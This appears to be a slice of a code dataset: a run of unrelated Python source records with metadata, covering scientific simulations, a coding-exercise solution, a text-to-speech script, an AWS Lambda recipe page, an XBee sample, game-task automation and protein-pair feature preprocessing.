implicit_coll(posc,velc,colc)\n rx_array.append(np.linalg.norm(col.Rx,axis=1))\n rv_array.append(np.linalg.norm(col.Rv,axis=1))\n # x2_array.append(posc)\n x_array.append(pos)\n v_array.append(vel)\n t_array.append(t)\n\n # colc.calc_residual_2018(1)\n # col.calc_residual_2018(4)\n # errorx = np.abs(col.x[2:,0,:]-np.around(colc.x[2:,0,:],14))/np.abs(np.around(colc.x[2:,0,:],14))\n # errorf = np.abs(col.F[2:,0,:]-np.around(colc.F[2:,0,:],14))/np.abs(np.around(colc.F[2:,0,:],14))\n # erroru = np.abs(col.u[2:,0,:]-np.around(colc.u[2:,0,:],14))/np.abs(np.around(colc.u[2:,0,:],14))\n # print(\"Diff in x: {0}\".format(errorx))\n # print(\"Diff in F: {0}\".format(errorf))\n # print(\"Diff in u: {0}\".format(erroru))\n # print(\"SDC solution: {0}\".format(col.Rv))\n # print(\"Collocation solution: {0}\".format(colc.Rv))\n rx_array = np.array(rx_array)\n rv_array = np.array(rv_array)\n x_array = np.array(x_array)\n # x2_array = np.array(x2_array)\n v_array = np.array(v_array)\n t_array = np.array(t_array)\n\n if col.predictor == True:\n rhs = (M-1)*(K+1)*Nt\n else:\n rhs = (M-1)*K*Nt\n\n wp_dump(t_array,x_array,v_array,dt,\"sdc_M{0}K{1}_wp_{2}.h5\".format(M,K,label),rhs=rhs,new=new)\n new = False\n\n plot_xres(t_array,rx_array,\"sdc_M{0}K{1}_\".format(M,K)+str(Nt))\n plot_vres(t_array,rv_array,\"sdc_M{0}K{1}_\".format(M,K)+str(Nt))\n plot_isotraj(x_array,\"sdc_\"+str(Nt),label=\"sim\")\n # plot_isotraj(x2_array,\"col2_\"+str(Nt),label=\"sim\")\n plot_vel(t_array,v_array,\"sdc_\"+str(Nt),label=\"sim\")\n","sub_path":"projects/penning/rvv_sdc.py","file_name":"rvv_sdc.py","file_ext":"py","file_size_in_byte":3422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"398837782","text":"########## hamoon's solution ##########\nimport sys\nsys.stdin = open('input1874.txt')\nT = int(input())\ns = [] # initialize the stack\nans = [] # initialize a list to print all results at once\ncount = 1 # initialize the counter\nTOF = True # initial flag for whether the sequence can be made\n# iterate over the length of the input sequence\nfor i in range(T):\n num = int(input())\n # if the input number is greater than or equal to count\n while count <= num:\n s.append(count) # push onto the stack\n ans.append('+') # record '+'\n count += 1 # increase count by 1\n 
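# now count > num: num was pushed earlier, so it can only be produced if it is still on top of the stack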
\n # if the input number is smaller than count\n # if the top of the stack equals the input value\n if s[-1] == num:\n s.pop() # pop the top of the stack\n ans.append('-') # record '-'\n # if the top of the stack differs from the input value\n else:\n TOF = False # set the flag to False\n# the sequence cannot be made, so print 'NO'\nif TOF == False:\n print('NO')\n# if it can be made, print the results\nelse:\n for i in ans:\n print(i)","sub_path":"알고리즘 스터디/큐&스택/백준_1874_스택수열.py","file_name":"백준_1874_스택수열.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"608608011","text":"#!/usr/bin/env python3\n\n\nimport argparse\nimport os, os.path\nimport random\nimport sys\nimport subprocess\nimport hashlib\nfrom gtts import gTTS\n\ntopics = []\n\ndef get_text_hash(text):\n return hashlib.md5(text.encode(\"utf-8\")).hexdigest()\n\n\ndef get_topics(path):\n for root, dirs, files in os.walk(path):\n return files\n\n\ndef get_random_sentence(topic):\n with open(topic) as file:\n sentences = [line for line in file]\n audio_files = []\n for sentence in sentences:\n audio_files.append(get_text_to_speech_file(sentence))\n return random.choice(audio_files)\n\n\ndef get_text_to_speech_file(text):\n hashstr = get_text_hash(text)\n tmp_file_path = '/tmp/{path}.mp3'.format(path=hashstr)\n if not os.path.isfile(tmp_file_path):\n tts = gTTS(text=text, lang=\"es\")\n tts.save(tmp_file_path)\n return tmp_file_path\n\n\ndef reproduce_file(_file):\n subprocess.call([\"cvlc\", \"--play-and-exit\", _file], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-t\", \"--text\", type=str, help=\"Text to reproduce\")\n parser.add_argument(\"-r\", \"--random\", action=\"store_true\", help=\"Reproduce random sentence from files in ./topics\")\n parser.add_argument(\"-w\", \"--what\", type=str, help=\"Specify topic to reproduce random sentence\")\n parser.add_argument(\"-g\", \"--generate\", action=\"store_true\", help=\"Generate mp3 files for precharged sentences\")\n parser.add_argument(\"-l\", \"--list\", action=\"store_true\", help=\"List available topics\")\n args = parser.parse_args()\n args = vars(args) \n\n myself = os.path.abspath(sys.argv[0])\n dir = os.path.dirname(myself)\n\n if args[\"text\"]:\n text = args[\"text\"]\n reproduce_file(get_text_to_speech_file(text))\n exit\n\n if args[\"random\"]:\n topics = get_topics(dir + '/topics')\n if args[\"what\"]:\n what = args[\"what\"]\n exist = False\n for item in topics:\n #print(item)\n if what in item:\n audio_file = get_random_sentence(dir + '/topics/' + item)\n exist = True\n if not exist:\n print (\"Choosen topic doesn't exist\")\n quit()\n else:\n audio_file = get_random_sentence(dir + '/topics/' + random.choice(topics))\n reproduce_file(audio_file)\n exit\n\n if args[\"generate\"]:\n topics = get_topics(dir + '/topics')\n for topic in topics:\n with open(dir + '/topics/' + random.choice(topics)) as file:\n sentences = [line for line in file]\n for sentence in sentences:\n generated_file = get_text_to_speech_file(sentence)\n print (\"Creating file %s...\" %generated_file)\n exit\n\n if args[\"list\"]:\n topics = get_topics(dir + '/topics')\n print (\"This is the list of available topics:\")\n for item in topics:\n print (item[:-4])\n exit\n\n","sub_path":"speech/speech.py","file_name":"speech.py","file_ext":"py","file_size_in_byte":2765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"345564337","text":"# coding: utf-8\n\nimport time\nfrom os 
import path\nimport decimal\nfrom logging import getLogger\n\nimport boto3\nimport rds_config\nimport pymysql\nfrom jinja2 import Environment, FileSystemLoader\n\nlogger = getLogger()\nenv = Environment(loader=FileSystemLoader(path.join(path.dirname(__file__), 'template'), encoding='utf8'))\n\nrds_host = \"recipe.csuoosoe1wmb.us-west-2.rds.amazonaws.com\"\nname = rds_config.db_username\npassword = rds_config.db_password\ndb_name = rds_config.db_name\n\ndef handle(event, context):\n # init\n recipe_id = event[\"pathParameters\"][\"id\"]\n result = {}\n\n # set query parameters\n selected_trouble = 0\n selected_cook_time = 0\n if event[\"queryStringParameters\"] is not None and \"trouble\" in event[\"queryStringParameters\"]:\n selected_trouble = int(event[\"queryStringParameters\"][\"trouble\"])\n result[\"selected_trouble\"] = selected_trouble\n if event[\"queryStringParameters\"] is not None and \"cook_time\" in event[\"queryStringParameters\"]:\n selected_cook_time = int(event[\"queryStringParameters\"][\"cook_time\"])\n result[\"selected_cook_time\"] = selected_cook_time\n\n # connect DB\n connect = pymysql.connect(rds_host, user=name, passwd=password, db=db_name, charset='utf8', connect_timeout=5)\n cursor = connect.cursor() \n\n # get recipe detail\n sql = 'select recipe_id, recipe_name, comment, cook_time, serving, image_name'\n sql += ' from recipes'\n sql += ' where recipe_id = %s'\n cursor.execute(sql, (recipe_id,))\n for row in cursor:\n result[\"recipe_detail\"] = {\n \"recipe_id\": row[0],\n \"recipe_name\": row[1],\n \"comment\": row[2],\n \"cook_time\": row[3],\n \"serving\": row[4],\n \"image_name\": row[5]\n }\n\n # get directions\n sql = 'select direction_comment from directions'\n sql += ' where recipe_id = %s'\n sql += ' order by direction_sequence'\n cursor.execute(sql, (recipe_id,))\n result[\"directions\"] = []\n for row in cursor:\n direction = {\n \"direction_comment\": row[0]\n }\n result[\"directions\"].append(direction)\n\n # get ingredients\n sql = \"select f.food_name, f.category_id, i.ingredient_quantity\"\n sql += \" from ingredients i\"\n sql += \" join foods f on i.food_id = f.food_id\"\n sql += \" where i.recipe_id = %s\"\n sql += \" order by f.category_id\"\n cursor.execute(sql, (recipe_id,))\n result[\"ingredients\"] = []\n for row in cursor:\n ingredient = {\n \"food_name\": row[0],\n \"ingredient_category\": row[1],\n \"ingredient_quantity\": row[2]\n }\n result[\"ingredients\"].append(ingredient)\n\n # set troubles for sidemenu\n sql = 'select trouble_id, trouble_name from troubles'\n cursor.execute(sql)\n result[\"troubles\"] = []\n for row in cursor:\n trouble = {\n \"trouble_id\": row[0],\n \"trouble_name\": row[1]\n }\n result[\"troubles\"].append(trouble)\n\n # set cook_time for side menu\n result[\"cook_times\"] = [5, 10, 15, 20, 30, 45]\n\n # close DB\n cursor.close()\n connect.close()\n \n # set return body\n template = env.get_template('recipe.html')\n html = template.render(result=result)\n\n return {\n \"statusCode\": 200,\n \"headers\": {\n \"Content-Type\": \"text/html\",\n \"Access-Control-Allow-Headers\":\"Content-Type,X-Amz-Date,Authorization\",\n \"Access-Control-Allow-Methods\":\"GET\",\n \"Access-Control-Allow-Origin\": \"*\"\n },\n \"body\": html\n }\n","sub_path":"functions/getRecipe/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"101664576","text":"# Copyright 2020, Digi International Inc.\n#\n# 
Permission to use, copy, modify, and/or distribute this software for any\n# purpose with or without fee is hereby granted, provided that the above\n# copyright notice and this permission notice appear in all copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES\n# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR\n# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\n# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\n# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF\n# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\nfrom digi.xbee.models.mode import APIOutputModeBit\nfrom digi.xbee.util import utils\nfrom digidevice import xbee\n\n\ndef main():\n print(\" +-------------------------------------------+\")\n print(\" | XBee Gateway Receive Explicit Data Sample |\")\n print(\" +-------------------------------------------+\\n\")\n\n device = xbee.get_device()\n\n try:\n device.open()\n\n device.set_api_output_mode_value(\n APIOutputModeBit.calculate_api_output_mode_value(\n device.get_protocol(), {APIOutputModeBit.EXPLICIT}))\n\n def explicit_data_callback(explicit_xbee_message):\n print(\"From %s >> %s\"\n % (explicit_xbee_message.remote_device.get_64bit_addr(),\n explicit_xbee_message.data.decode()))\n print(\" - Source endpoint: %s\"\n % utils.hex_to_string(utils.int_to_length(explicit_xbee_message.source_endpoint)))\n print(\" - Destination endpoint: %s\"\n % utils.hex_to_string(utils.int_to_length(explicit_xbee_message.dest_endpoint)))\n print(\" - Cluster ID: %s\"\n % utils.hex_to_string(utils.int_to_length(explicit_xbee_message.cluster_id)))\n print(\" - Profile ID: %s\"\n % utils.hex_to_string(utils.int_to_length(explicit_xbee_message.profile_id)))\n\n device.flush_queues()\n device.add_expl_data_received_callback(explicit_data_callback)\n\n print(\"Waiting for data in explicit format...\\n\")\n\n input()\n\n finally:\n if device.is_open():\n device.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"samples/xbee/communication/explicit/ReceiveExplicitDataSample/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"230373748","text":"from os import getcwd, listdir\nfrom sys import path\n\nfrom foo.pictureR import pictureFind\nfrom foo.win import toast\nfrom common2 import adb\n\nclass Task:\n def __init__(self, cwd, ico, listGoTo):\n self.cwd = cwd\n self.switch = False\n self.icon = ico\n #self.screenShot = self.cwd + '/bin/adb/arktemp.png'\n self.task = pictureFind.picRead(self.cwd + \"/res/panel/other/task.png\")\n self.get = pictureFind.picRead(self.cwd + \"/res/panel/other/get.png\")\n self.daySel = pictureFind.picRead(self.cwd + \"/res/panel/other/dailyTaskSelect.png\")\n self.actSel = pictureFind.picRead(self.cwd + \"/res/panel/other/actSelect.png\")\n self.weekUnSel = pictureFind.picRead(self.cwd + \"/res/panel/other/weeklyTaskUnSelect.png\")\n self.weekSel = pictureFind.picRead(self.cwd + \"/res/panel/other/weeklyTaskSelect.png\")\n self.back = pictureFind.picRead(self.cwd + '/res/panel/other/back.png')\n self.rewardFinish = pictureFind.picRead(self.cwd + '/res/panel/other/rewardFinish.png')\n self.collectAll = pictureFind.picRead(self.cwd + '/res/panel/other/collectAll.png')\n\n self.listGoTo = listGoTo\n self.mainpage = self.listGoTo[0]\n 
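# (listGoTo order: [0] main page entry, [1] home button, [2] main page marker)\n 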
        self.home = self.listGoTo[1]\n        self.mainpageMark = self.listGoTo[2]\n\n    def goToMainpage(self):\n        listGoToTemp = self.listGoTo.copy()\n        tryCount = 0\n        while self.switch:\n            screenshot = adb.getScreen_std()\n            for eachStep in listGoToTemp:\n                bInfo = pictureFind.matchImg(screenshot, eachStep)\n                if bInfo != None:\n                    listGoToTemp.remove(eachStep)\n                    break\n            else:\n                listGoToTemp = self.listGoTo.copy()\n                tryCount += 1\n                if tryCount > 5:\n                    return False\n\n            if bInfo != None:\n                if bInfo['obj'] == 'act.png':\n                    return True\n                else:\n                    adb.click(bInfo['result'][0], bInfo['result'][1])\n\n\n    def checkTask(self):\n        tryCount = 0\n        cInfo = pictureFind.matchImg(adb.getScreen_std(), self.task)\n        if cInfo == None:\n            print('Could not find the task hand-in entry, aborting the rest of the task hand-in')\n            return False\n        else:\n            while self.switch:\n                adb.click(cInfo['result'][0], cInfo['result'][1])\n\n                screenshot = adb.getScreen_std()\n                if pictureFind.matchImg(screenshot, self.daySel) != None:\n                    return True\n                elif pictureFind.matchImg(screenshot, self.actSel) != None:\n                    return True\n                else:\n                    tryCount += 1\n                    if tryCount > 5:\n                        return False\n\n    def submitTask(self):\n        # hand in the tasks in the currently selected tab\n        endCount = 0\n        while self.switch:\n            screenshot = adb.getScreen_std()\n            #gInfo = pictureFind.matchImg(screenshot, self.get, 0.9)\n            collectAllInfo = pictureFind.matchImg(screenshot, self.collectAll, 0.8)\n            backInfo = pictureFind.matchImg(screenshot, self.back, 0.9)\n            #rewardFinishInfo = pictureFind.matchMultiImg(screenshot, self.rewardFinish, \n            #                                             confidencevalue = adb.getTagConfidence())[0]\n            #if rewardFinishInfo != None:\n            #    rewardFinishInfo.sort(key = lambda x:x[1])\n            #    if rewardFinishInfo[0][1] < 250:  # all tasks in this tab have been handed in\n            #        return True\n            if collectAllInfo != None: # there are tasks awaiting collection\n                endCount = 0\n                adb.click(collectAllInfo['result'][0], collectAllInfo['result'][1])\n                continue\n            elif backInfo != None: # no tasks awaiting collection\n                endCount += 1\n                if endCount > 3:\n                    return True\n                else:\n                    continue\n            else: # a reward popup was shown\n                endCount = 0\n                adb.click(720, 120)\n                continue\n\n    def oneByOne(self):\n        #adb.screenShot()\n        tryCount = 0\n        self.submitTask()\n        while self.switch:\n            # switch to the weekly task tab\n            wInfo = pictureFind.matchImg(adb.getScreen_std(), self.weekUnSel)\n            adb.click(wInfo['result'][0], wInfo['result'][1])\n            wInfo = pictureFind.matchImg(adb.getScreen_std(), self.weekSel)\n            if wInfo != None:\n                break\n            else:\n                tryCount += 1\n                if tryCount > 5:\n                    return False\n        self.submitTask()\n\n\n\n    def run(self, switchI):\n        self.switch = switchI\n        condition0 = self.goToMainpage()\n        if condition0:\n            condition1 = self.checkTask()\n            if condition1:\n                self.oneByOne()\n        if self.switch and (not condition0):\n            toast.broadcastMsg(\"ArkHelper\", \"task hand-in failed\", self.icon)\n\n        elif self.switch and (not condition1):\n            toast.broadcastMsg(\"ArkHelper\", \"no task hand-in needed\", self.icon)\n\n        elif self.switch:\n            self.goToMainpage()\n            toast.broadcastMsg(\"ArkHelper\", \"task hand-in finished\", self.icon)\n\n        self.switch = False\n\n    def stop(self):\n        self.switch = False","sub_path":"foo/arknight/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":5404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"2166187","text":"# encoding: utf-8\n\"\"\"\n@author: julse@qq.com\n@time: 2020/4/18 17:15\n@desc:\n\"\"\"\nimport os\nimport numpy as np\n# from keras.utils import to_categorical\n\nfrom common import check_path, handleBygroup, getPairs\n\n\nclass Feature_type:\n    V_PSSM='V_PSSM'\n    H_PSSM='H_PSSM'\n    SEQ_1D = 'SEQ_1D'\n    SEQ_1D_OH = 'SEQ_1D_OH' # onehot\n    SEQ_2D = 'SEQ_2D'\nclass BaseFeature:\n
    def base_compose(self,dirout_feature,fin_pair,dir_feature_db,feature_type='V_PSSM',fout_pair=''):\n        check_path(dirout_feature)\n        fo = open(fout_pair,'w') if fout_pair!='' else None\n        row = 0\n        for pairs in getPairs(fin_pair):\n            a = pairs[0]\n            b = pairs[1]\n            # print(pairs) # ['O35668', 'P00516']\n            fa = os.path.join(dir_feature_db, a + '.npy')\n            fb = os.path.join(dir_feature_db, b + '.npy')\n            row = row + 1\n            print('loading feature pair %d'%row)\n            if not (os.access(fa, os.F_OK) and os.access(fb, os.F_OK)):\n                print('===============features of pairs not found %s %s================' % (a, b), os.access(fa, os.F_OK),\n                      os.access(fb, os.F_OK))\n                continue\n            pa = np.load(fa,allow_pickle=True)\n            pb = np.load(fb,allow_pickle=True)\n            if (len(pa)<50 or len(pa)>2000 or max(pa)>20) or (len(pb)<50 or len(pb)>2000 or max(pb)>20):\n                print('wrong length or x')\n                continue\n            if fo!=None:\n                fo.write('%s\\t%s\\n'%(a,b))\n                fo.flush()\n            # padding\n            if feature_type == Feature_type.V_PSSM:pc = self.padding_PSSM(pa,pb,vstack=True)\n            elif feature_type == Feature_type.H_PSSM:pc = self.padding_PSSM(pa,pb,vstack=False)\n            elif feature_type == Feature_type.SEQ_1D:pc = self.padding_seq1D(pa,pb,vstack=False)\n            # elif feature_type == Feature_type.SEQ_1D_OH:pc = self.padding_seq1D(pa,pb,vstack=False)\n            elif feature_type == Feature_type.SEQ_2D:pc = self.padding_seq2D(pa,pb)\n            else:\n                print('incorrect feature_type')\n                return\n            # save the padded feature pair\n            fout = os.path.join(dirout_feature, \"%s_%s.npy\" % (a, b))\n            np.save(fout, pc)\n            del pc, pa, pb\n        if fo != None:\n            fo.close()\n    def padding_PSSM(self,pa,pb,vstack=True,shape=(2000,21)):\n        pa_pad_col = np.pad(pa, ((0, 0), (0, shape[1]-pa.shape[1])), 'constant', constant_values=(0, 1))\n        pb_pad_col = np.pad(pb, ((0, 0), (0, shape[1]-pb.shape[1])), 'constant', constant_values=(0, 1))\n        # earlier preprocessing was not strict; some proteins probably exceed length 2000\n        pa_pad_row = np.pad(pa_pad_col, ((0, shape[0] - pa.shape[0]), (0, 0)), 'constant')\n        pb_pad_row = np.pad(pb_pad_col, ((0, shape[0] - pb.shape[0]), (0, 0)), 'constant')\n        pc = np.vstack([pa_pad_row, pb_pad_row]) if vstack else np.hstack([pa_pad_row, pb_pad_row])\n        return pc\n    def padding_seq1D(self,pa,pb,vstack=True,shape=(2000,)):\n        # data.shape = (4000,)\n        # warning: the padding value does not appear in the original data\n        pa_pad_col = np.pad(pa, ((0, shape[0]-pa.shape[0])), 'constant', constant_values=0)\n        pb_pad_col = np.pad(pb, ((0, shape[0]-pb.shape[0])), 'constant', constant_values=0)\n        pc = np.vstack([pa_pad_col, pb_pad_col]) if vstack else np.hstack([pa_pad_col, pb_pad_col])\n        return pc\n\n    def padding_seq2D(self,pa,pb,shape=(2000*2000,21*21)):\n        pa_pad_col = np.pad(pa, ((0, 2000 - pa.shape[0])), 'constant', constant_values=0)\n        pb_pad_col = np.pad(pb, ((0, 2000 - pb.shape[0])), 'constant', constant_values=0)\n        pc = np.zeros((2000,2000))\n        lookUpTable = self.constructLookUpTable()\n        for idx, x in enumerate(pa_pad_col):\n            for idy, y in enumerate(pb_pad_col):\n                pc[idx, idy] = lookUpTable.index(x*100+y)\n                # tmp_sp_2D[i,idx,idy,0] = lookUpTable.index(x*100+y)[0] # todo\n        return pc\n    # support\n    def constructLookUpTable(self):\n        lookUpTable = [0] * 21 * 21\n        aminos = [i for i in range(21)]\n        cell = 0\n        for i in aminos:\n            for j in aminos:\n                lookUpTable[cell] = i * 100 + j\n                cell = cell + 1\n        return lookUpTable\ndef getGroupFeature(group_dir_pair,dir_feature_db,feature_type=Feature_type.SEQ_1D):\n    src = 'pairdata'\n    des = 'feature'\n    func = BaseFeature().base_compose\n    handleBygroup(group_dir_pair, src, des, func,dir_feature_db,feature_type=feature_type)\n
    # dir_feature_db = '/home/jjhnenu/data/PPI/release/featuredb/seq_feature_1D/'\n    # group_dir_pair = '/home/jjhnenu/data/PPI/release/data/group/'\n\nif __name__ == '__main__':\n    print()\n    cloud = 'jjhnenu'\n\n    # filename = 'positiveV1_fswissprot_Composi_5'\n    # basepath = '/home/%s/data/PPI/stage2/processPair2445/pair/%s' % (cloud, filename)\n    # # dir_std_pssm = '%s/PSSM/output_std_head' % basepath\n    '''\n    pssm\n    '''\n    # dir_std_pssm = '/home/jjhnenu/data/PPI/stage2/processPair2445/pair/positiveV1_fswissprot_Composi_5/PSSM/output_std_head'\n    # dir_pair = '/home/%s/data/PPI/release/data/p_fp_fw_2_1_1/'%cloud\n    # for eachfile in os.listdir(dir_pair):\n    #     print(eachfile)\n    #     finpair = os.path.join(dir_pair, eachfile)\n    #     dir_foutFeaturePair = '/home/%s/data/PPI/release/feature/pssm_feature_2D_vstack/p_fp_fw_2_1_1/%s/' % (cloud,eachfile.split('.')[0])\n    #     BaseFeature().compose_PSSM(dir_foutFeaturePair,finpair,dir_std_pssm)\n    '''\n    seq1D\n    '''\n    # dir_feature_db = '/home/jjhnenu/data/PPI/release/featuredb/seq_feature_1D/'\n    # dir_pair = '/home/%s/data/PPI/release/data/p_fp_fw_2_1_1/'%cloud\n    # for eachfile in os.listdir(dir_pair):\n    #     print(eachfile)\n    #     fin_pair = os.path.join(dir_pair, eachfile)\n    #     dirout_feature = '/home/%s/data/PPI/release/feature/seq_feature_1D/p_fp_fw_2_1_1/%s/' % (cloud,eachfile.split('.')[0])\n    #     BaseFeature().base_compose(dirout_feature,fin_pair,dir_feature_db,feature_type=Feature_type.SEQ_1D)\n    '''\n    seq1D_onehot\n    just use seq1D\n    '''\n\n    '''\n    seq2D\n    too large\n    '''\n    # dir_feature_db = '/home/jjhnenu/data/PPI/release/featuredb/seq_feature_1D/'\n    # dir_pair = '/home/%s/data/PPI/release/data/p_fp_fw_2_1_1/'%cloud\n    # for eachfile in os.listdir(dir_pair):\n    #     print(eachfile)\n    #     fin_pair = os.path.join(dir_pair, eachfile)\n    #     dirout_feature = '/home/%s/data/PPI/release/feature/seq_feature_2D/p_fp_fw_2_1_1/%s/' % (cloud,eachfile.split('.')[0])\n    #     BaseFeature().base_compose(dirout_feature,fin_pair,dir_feature_db,feature_type=Feature_type.SEQ_2D)\n\n    '''\n    pssm hstack\n    '''\n    # dir_feature_db = '/home/jjhnenu/data/PPI/stage2/processPair2445/pair/positiveV1_fswissprot_Composi_5/PSSM/output_std_head'\n    # dir_pair = '/home/%s/data/PPI/release/data/p_fp_fw_2_1_1/'%cloud\n    # for eachfile in os.listdir(dir_pair):\n    #     print(eachfile)\n    #     fin_pair = os.path.join(dir_pair, eachfile)\n    #     dirout_feature = '/home/%s/data/PPI/release/feature/pssm_feature_2D_hstack/p_fp_fw_2_1_1/%s/' % (cloud,eachfile.split('.')[0])\n    #     BaseFeature().base_compose(dirout_feature,fin_pair,dir_feature_db,feature_type=Feature_type.H_PSSM)\n\n    '''\n    pssm 400 hstack\n    '''\n    # dir_feature_db = '/home/jjhnenu/data/PPI/stage2/processPair2445/pair/positiveV1_fswissprot_Composi_5/PSSM/output_std_400_1'\n    # dir_pair = '/home/%s/data/PPI/release/data/p_fp_fw_2_1_1/'%cloud\n    # for eachfile in os.listdir(dir_pair):\n    #     print(eachfile)\n    #     fin_pair = os.path.join(dir_pair, eachfile)\n    #     dirout_feature = '/home/%s/data/PPI/release/feature/pssm400_feature_1D/p_fp_fw_2_1_1/%s/' % (cloud,eachfile.split('.')[0])\n    #     BaseFeature().base_compose(dirout_feature,fin_pair,dir_feature_db,feature_type=Feature_type.SEQ_1D)\n\n    '''\n    group seq1D\n    '''\n    # dir_feature_db = '/home/jjhnenu/data/PPI/release/featuredb/seq_feature_1D/'\n    # group_dir_pair = '/home/jjhnenu/data/PPI/release/pairdata/group/'\n    # getGroupFeature(group_dir_pair, dir_feature_db, feature_type=Feature_type.SEQ_1D)\n\n\n    '''\n    feature pair \n    positive \n    swissprot\n    '''\n    # dir_feature_db = '/home/19jiangjh/data/PPI/release/featuredb/seq_feature_1D/'\n
    # dir_pair = '/home/19jiangjh/data/PPI/release/pairdata'\n    # for eachfile in ['negative_fswissprot_7177.txt','negative_fpositive_10245.txt','positive_2049.txt']:\n    #     print(eachfile)\n    #     fin_pair = os.path.join(dir_pair, eachfile)\n    #     dirout_feature = '/home/19jiangjh/data/PPI/release/feature/p_fp_fw'\n    #     BaseFeature().base_compose(dirout_feature,fin_pair,dir_feature_db,feature_type=Feature_type.SEQ_1D)\n\n    dir_feature_db = '/home/19jjhnenu/Data/SeqTMPPI2W/featuredb/'\n    dir_pair = '/home/19jjhnenu/Data/SeqTMPPI2W/pair/p_fw_13349/0'\n    for eachfile in ['negative_fswissprot_7177.txt','negative_fpositive_10245.txt','positive_2049.txt']:\n        print(eachfile)\n        fin_pair = os.path.join(dir_pair, eachfile)\n        dirout_feature = '/home/19jiangjh/data/PPI/release/feature/p_fp_fw'\n        BaseFeature().base_compose(dirout_feature,fin_pair,dir_feature_db,feature_type=Feature_type.SEQ_1D)","sub_path":"FeatureDealer.py","file_name":"FeatureDealer.py","file_ext":"py","file_size_in_byte":9275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"357660249","text":"\"\"\"\nastroHOG Statistical tests\n\"\"\"\n\nimport numpy as np\n\n# ------------------------------------------------------------------------------------------------------------------------\ndef HOG_PRS(phi):\n   # Calculates the projected Rayleigh statistic of the distributions of angles phi.\n   #\n   # INPUTS\n   # phi      - angles between -pi/2 and pi/2\n   #\n   # OUTPUTS\n   # Zx       - value of the projected Rayleigh statistic \n   # s_Zx     - uncertainty on Zx\n   # meanPhi  - mean orientation angle\n\n   angles=phi #2.*phi\n\n   Zx=np.sum(np.cos(angles))/np.sqrt(np.size(angles)/2.)\n   temp=np.sum(np.cos(angles)*np.cos(angles))\n   s_Zx=np.sqrt((2.*temp-Zx*Zx)/np.size(angles))\n\n   Zy=np.sum(np.sin(angles))/np.sqrt(np.size(angles)/2.)\n   temp=np.sum(np.sin(angles)*np.sin(angles))\n   s_Zy=np.sqrt((2.*temp-Zy*Zy)/np.size(angles))\n\n   meanPhi=0.5*np.arctan2(Zy, Zx)\n\n   return Zx, s_Zx, meanPhi\n\n# ------------------------------------------------------------------------------------------------------------------------------\ndef HOG_AM(phi):\n   # Calculate the alignment measure.\n   #\n   # INPUTS\n   # phi      - angles between -pi/2 and pi/2\n   #\n   # OUTPUTS\n   # AM       - value of the alignment measure. \n
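   #            (close to 1 when the angles are mostly parallel, close to -1 when mostly perpendicular)\n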
\n   angles=phi\n\n   ami=2.*np.cos(phi)-1.\n   am=np.mean(ami)\n\n   return am\n\n\n","sub_path":"statests.py","file_name":"statests.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"426384530","text":"#this will allow you to pick two items and plot them\n#options are all within parm array\n#options: z, Nf, Nx, alphaX, Mmin, avg temp\n\nfileglob = '/home/amber/data/alpha0/*'\nfileblob = '/home/amber/data/alpha1/*'\n#looks at all files within specified alpha folder\n\nfrom twentyonecmfast_tools import *\n#imports everything within directory\n \nimport matplotlib.pyplot as plt\nimport numpy as np\n\n#load_andre_models returns 4 sets of data\n#this assigns variables to the 4 sets\np,k,d,e=load_andre_models(fileglob)\nP,K,D,E=load_andre_models(fileblob)\n#p is the parm array\n#k is the k array\n#d is the delta2 array\n#e is the delta2 error array\n\n#p has the option for plotting\n#shape of p is 83 data points for each of the 6\n#row 0 is z\n#row 1 is Nf\n#row 2 is Nx\n#row 3 is alphaX\n#row 4 is Mmin\n#row 5 is avg temp\n\n#fixed bottom axis of plot\nx=np.argsort(p[:,0])\nX=np.argsort(P[:,0])\n\n#fixed data vs other item in same order\nplt.plot(p[x,0],p[x,5], color='r', label='alpha0')\nplt.plot(P[X,0],P[X,5], color='b', label='alpha1')\n\n#customize plot\nplt.ylabel('avg temp')\nplt.xlabel('z')\nplt.title('z vs. avg temp')\nplt.legend(loc='lower right')\n\n#display plot\nplt.show()\n","sub_path":"plottwoparms.py","file_name":"plottwoparms.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"249644732","text":"import streamlit as st\r\nfrom scipy.integrate import odeint\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\n#st.set_page_config(layout=\"wide\")\r\nst.set_page_config(page_title='simulatingSars',page_icon='')\r\nst.title('SARS-CoV-2 Infection Model')\r\n\r\n@st.cache\r\ndef deriv(y, t, N, beta, alfaa, alfag, alfah, alfai, deltaa, deltai, gammaa, gammai, gammah, gammag, sigmah, sigmag, pe, pa, pi, ph, pg, w, mu, v, lamda, q):\r\n    